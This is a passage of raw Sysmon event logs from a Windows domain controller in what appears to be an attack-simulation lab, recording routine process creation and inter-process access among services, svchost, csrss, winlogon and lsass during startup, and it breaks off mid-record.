154100x8000000000000000796Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.315{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\system32\svchost.exe -k LocalServiceC:\Windows\system32\NT AUTHORITY\LOCAL SERVICE{08A6967A-4288-6000-E503-000000000000}0x3e50SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x8000000000000000795Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.307{08A6967A-4286-6000-0A00-000000009A01}8441120C:\Windows\system32\services.exe{08A6967A-4288-6000-0F00-000000009A01}1124C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000794Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.307{08A6967A-4286-6000-0A00-000000009A01}8441120C:\Windows\system32\services.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000793Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.307{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-0F00-000000009A01}1124C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.307{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.291{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000790Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.291{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4288-6000-0F00-000000009A01}1124C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000789Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.291{08A6967A-4286-6000-0A00-000000009A01}844936C:\Windows\system32\services.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.291{08A6967A-4286-6000-0A00-000000009A01}844924C:\Windows\system32\services.exe{08A6967A-4288-6000-0F00-000000009A01}1124C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000787Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.300{08A6967A-4288-6000-0F00-000000009A01}1124C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\System32\svchost.exe -k termsvcsC:\Windows\system32\NT AUTHORITY\NETWORK SERVICE{08A6967A-4288-6000-E403-000000000000}0x3e40SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x8000000000000000786Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.291{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.291{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.291{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000783Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.291{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000782Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.291{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000781Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.291{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0900-000000009A01}800C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000780Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.291{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000779Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.291{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0900-000000009A01}800C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000778Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.291{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000777Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.291{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000776Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.291{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000775Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.291{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000774Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.291{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000773Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.275{08A6967A-4286-6000-0800-000000009A01}716820C:\Windows\system32\csrss.exe{08A6967A-4288-6000-0E00-000000009A01}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000772Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.275{08A6967A-4286-6000-0900-000000009A01}800804C:\Windows\system32\winlogon.exe{08A6967A-4288-6000-0E00-000000009A01}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\winlogon.exe+193b7|C:\Windows\system32\winlogon.exe+22617|C:\Windows\system32\winlogon.exe+2b287|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000771Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.283{08A6967A-4288-6000-0E00-000000009A01}1076C:\Windows\System32\LogonUI.exe10.0.14393.0 (rs1_release.160715-1616)Windows Logon User Interface HostMicrosoft® Windows® Operating SystemMicrosoft Corporationlogonui.exe"LogonUI.exe" /flags:0x2 /state0:0xa3b8b055 /state1:0x41c64e6dC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e71SystemMD5=B38DFCF985D8AE5B1A17C264981E61C7,SHA256=AA62D29803D52EC06CD27ED3124E034048F09606EB7342181913C9817C7B44C5,IMPHASH=A6F3A84D171E55B51A7343E05C8DFAC3{08A6967A-4286-6000-0900-000000009A01}800C:\Windows\System32\winlogon.exewinlogon.exe 10341000x8000000000000000770Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.275{08A6967A-4287-6000-0C00-000000009A01}588640C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000769Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 